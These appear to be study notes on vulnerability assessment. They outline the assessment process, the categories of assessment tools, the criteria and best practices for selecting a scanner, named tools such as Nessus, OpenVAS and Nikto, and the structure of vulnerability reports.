1. Locate Nodes: Identify the devices, servers, or endpoints in the network that need to be assessed.
2. Perform Service and OS Discovery on Them: Scan the located nodes to determine the running services and
operating systems.
3. Test Services and OS for Known Vulnerabilities: Evaluate the discovered services and OS against known
vulnerability databases.
4. Findings and Recommendations: Generate a report with the vulnerabilities found and suggest mitigation
measures.
5. Terms of Reference: Define the scope, objectives, rules of engagement and guidelines for the vulnerability scanning process.
Types of Vulnerability Assessments Tools
Host-Based Vulnerability Assessment Tools
• Identify the OS running on a host and detect vulnerabilities.
• Search for common applications and services.

Depth Assessment Tools


• Find unknown vulnerabilities in a system.
• Use fuzzers to identify weaknesses.

Application-Layer Vulnerability Assessment Tools


• Focus on web servers or databases.

Scope Assessment Tools


• Secure IT systems by testing applications and OS for vulnerabilities.

Active and Passive Tools


• Active scanners check networks but consume resources.
• Passive scanners observe and process data without affecting performance.

Location and Data Examination Tools


• Include network-based, agent-based, proxy, and cluster scanners.

Criteria for a Vulnerability Assessment Tool


Criteria for choosing a vulnerability assessment tool:
1. Types of vulnerabilities covered.
2. Testing capability and system coverage.


3. Ability to produce clear, actionable reports.


4. Efficiency, resource usage, and service impact.
5. Smart scanning capabilities.
6. Support for user-developed tests.
7. Test scheduling for optimal network performance.

Best Practices for Selecting Vulnerability Assessment Tools


• Ensure that it does not damage your network or system while running tools.
• Understand the functionality and decide on the information that needs to be collected before beginning.
• Decide the source location of the scan, taking into consideration the information that needs to be collected.
• Enable logging every time a computer is scanned.
• Users should scan their systems frequently for vulnerabilities.

Vulnerability Assessment Tools


Qualys-
• Cloud based service that provides insights into latest internet threats and the systems that are susceptible to
them.
• Provides continuous identification and monitoring of unexpected changes.

Nessus-
• Arguably one of the best platforms for vulnerability scanning and for identifying configuration issues and malware.
GFI LanGuard-
• Scans, detects, assesses and rectifies security vulnerabilities in a network and its connected devices.

OpenVAS-
• A framework of several tools for performing vulnerability scanning and management.

Nikto-
• A web server assessment tool that discovers vulnerabilities and potential threats on a web server.

Other tools include:


Qualys FreeScan, beSECURE (AVDS), Acunetix Web Vulnerability Scanner, Nexpose, Network Security
Scanner,SAINT, Nipper Studio, Core Impact Pro, etc.

Vulnerability Assessment Reports

A Vulnerability Assessment Report is a document that outlines the security weaknesses found in a system, network, or application after scanning; in short, it contains the scanner's assessment of vulnerabilities.

It helps organizations identify potential security risks and take action to mitigate them before attackers can exploit them. A report typically has three parts:


o Scan Information – Details about the scanning process, including tools, methodologies, and
configurations used.
o Target Information – Information about the systems, applications, or networks being assessed.
o Results – Findings from the assessment, including identified vulnerabilities, risk levels, and
remediation recommendations.

Two types of vulnerability reports:

1. Security Vulnerability Reports


o For all scanned devices and servers.
o Includes new vulnerabilities, open ports, remediation suggestions and patch links.

2. Security Vulnerability Summaries.


o Individual scan report for each device or server.
o Summary includes current flaws, vulnerability categories, new findings,severity, and resolved
vulnerabilities.
